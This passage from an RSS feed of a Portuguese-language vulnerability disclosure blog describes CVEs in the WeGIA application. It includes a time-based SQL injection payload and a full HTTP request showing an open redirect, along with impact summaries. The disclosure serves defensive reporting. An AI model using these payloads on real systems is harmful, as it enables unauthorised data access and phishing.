    &amp;lt;li&amp;gt;Comprometimento da integridade: invasores podem induzir usuários privilegiados a realizar ações destrutivas visitando uma página controlada por eles.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Possível perda de dados ou interrupção operacional se IDs não protegidos por restrições de FK forem visados.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61605</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-61605/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-61605/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61605-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-descricao-do-endpoint-controlecontrolphp&amp;#34;&amp;gt;CVE-2025-61605: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61605-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-descricao-do-endpoint-controlecontrolphp&amp;#34;&amp;gt;CVE-2025-61605: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;%20AND%20SLEEP(5)%20AND%20&amp;amp;#39;1&amp;amp;#39;%3D&amp;amp;#39;1&amp;amp;#39;--%20-
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61605/image.png&amp;#34;
	width=&amp;#34;1530&amp;#34;
	height=&amp;#34;710&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61605/image_hu_14dc839ca21520de.png 480w, /p/cve-2025-61605/image_hu_b816c8af74ba98e7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;215&amp;#34;
		data-flex-basis=&amp;#34;517px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61606</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-61606/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-61606/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61606-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-61606: Vulnerabilidade de Open Redirect no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Open Redirect foi identificada no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; do aplicativo WeGIA, especificamente no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; (metodo=listarUm nomeClasse=FuncionarioControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61606-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-61606: Vulnerabilidade de Open Redirect no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Open Redirect foi identificada no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; do aplicativo WeGIA, especificamente no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; (metodo=listarUm nomeClasse=FuncionarioControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.&amp;lt;/p&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET metodo=listarUm&amp;amp;amp;nomeClasse=FuncionarioControle&amp;amp;amp;nextPage=https%3A%2F%2Fgoogle.com&amp;amp;amp;id_funcionario=2&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;request&amp;#34;&amp;gt;Request:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/controle/control.php?metodo=listarUm&amp;amp;amp;nomeClasse=FuncionarioControle&amp;amp;amp;nextPage=https%3A%2F%2Fgoogle.com&amp;amp;amp;id_funcionario=2 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/funcionario/informacao_funcionario.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: {COOKIE}
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O servidor aceita a solicitação elaborada e redireciona com sucesso a vítima para &amp;lt;code&amp;gt;https://google.com&amp;lt;/code&amp;gt; em vez de restringir a navegação ao domínio do próprio aplicativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Phishing: Invasores podem induzir usuários a visitar sites maliciosos que imitam sites legítimos.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Roubo de credenciais: Páginas de login falsas podem capturar credenciais de usuários.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Distribuição de malware: As vítimas podem ser redirecionadas para sites que hospedam software malicioso.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Danos à reputação: Os usuários podem perder a confiança na plataforma Wegia se forem vítimas de abuso em campanhas de phishing.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61665</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-61665/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-61665/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61665-controle-de-acesso-quebrado-no-endpoint-get_relatorios_sociosphp&amp;#34;&amp;gt;CVE-2025-61665: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Foi identificada uma vulnerabilidade de Controle de Acesso Quebrado no endpoint &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que atacantes não autenticados acessem diretamente informações pessoais e financeiras sensíveis dos membros sem exigir autenticação ou autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
